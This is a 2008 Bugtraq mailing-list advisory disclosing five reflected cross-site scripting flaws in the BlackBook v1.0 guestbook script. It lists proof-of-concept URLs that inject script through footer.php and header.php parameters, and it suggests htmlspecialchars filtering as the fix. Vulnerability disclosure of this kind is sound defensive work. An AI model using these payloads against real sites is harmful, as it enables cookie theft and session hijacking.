BlackBook v1.0 Multiple XSS Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: BlackBook v1.0 Multiple XSS Vulnerabilities
From: irancrash@xxxxxxxxx
Date: 2 May 2008 04:29:23 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

----------------------------------------------------------------
Script : BlackBook v1.0
Type : Multiple XSS Vulnerabilities
----------------------------------------------------------------
Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)
----------------------------------------------------------------
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
----------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------
Script Download : http://membres.lycos.fr/eejj33/download/blackbook10.zip
----------------------------------------------------------------
XSS 1 : 
http://Example/blackbook/footer.php?bookCopyright=<script>alert(document.cookie)</script>
XSS 2 : 
http://Example/blackbook/footer.php?ver=<script>alert(document.cookie)</script>
XSS 3 : http://Example/blackbook/header.php?bookName=</title> 
<script>alert(document.cookie)</script>
XSS 4 : http://Example/blackbook/header.php?bookMetaTags=";> 
<script>alert(document.cookie)</script>
XSS 5 : http://Example/blackbook/header.php?estiloCSS=";> 
<script>alert(document.cookie)</script>
----------------------------------------------------------------
Solution : Filter With htmlspecialchar() function .......
----------------------------------------------------------------
TNx : God......
Khashayar Fereidani Email : irancrash<at>gmail<dot>com
----------------------------------------------------------------

Prev by Date: [SECURITY] [DSA 1566-1] New cpio packages fix denial of service
Next by Date: Lifetype 1.2.7 XSS Vulnerability
Previous by thread: [SECURITY] [DSA 1566-1] New cpio packages fix denial of service
Next by thread: Lifetype 1.2.7 XSS Vulnerability
Index(es):
- Date
- Thread